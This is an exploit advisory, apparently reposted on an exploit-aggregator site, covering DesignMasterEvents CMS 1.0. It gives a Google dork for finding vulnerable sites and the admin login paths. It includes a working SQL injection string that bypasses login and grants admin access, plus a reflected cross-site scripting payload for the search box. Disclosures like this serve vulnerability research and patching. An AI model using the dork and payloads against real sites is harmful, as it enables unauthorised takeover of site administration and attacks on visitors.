DesignMasterEvents CMS 1.0 SQL Injection / Cross Site Scripting
CVE
Category
Price
Severity
CWE-89
N/A
High
Author
Risk
Exploitation Type
Date
N/A
High
Remote
2020-03-30
CPE
cpe:cpe:/a:designmasterevents:cms:1.0
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020030177 Below is a copy:
DesignMasterEvents CMS 1.0 SQL Injection / Cross Site Scripting # Exploit Title: DesignMasterEvents Conference management CMS SQL Injection Auth Bypass & XSS Vulnerability
# Google Dork: intext:"by :Design Master Events"
# Date: 2020-03-28
# Exploit Author: @ThelastVvV
# Vendor Homepage: http://www.designmasterevents.com
# Version: 1.0
# Tested on: Ubuntu
---------------------------------------------------------
PoC 1:
Authentication Bypass / SQL Injection
# Admin Control Panel Paths :
www.anysite.com/admin/
www.anysite.com/admin/login.php
Payload(s)
USERNAME: admin' or '1' = '1'; -- -
PASSWORD: vvv
the SQL injection attack has resulted in a bypass of the login, and we are now authenticated as "admin".
PoC 2 :
XSS Vulnerability
Payload(s) :
In Search box use payload:
"><img src=x onerror=prompt(document.domain);>
www.anysite.com/certificate.php
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum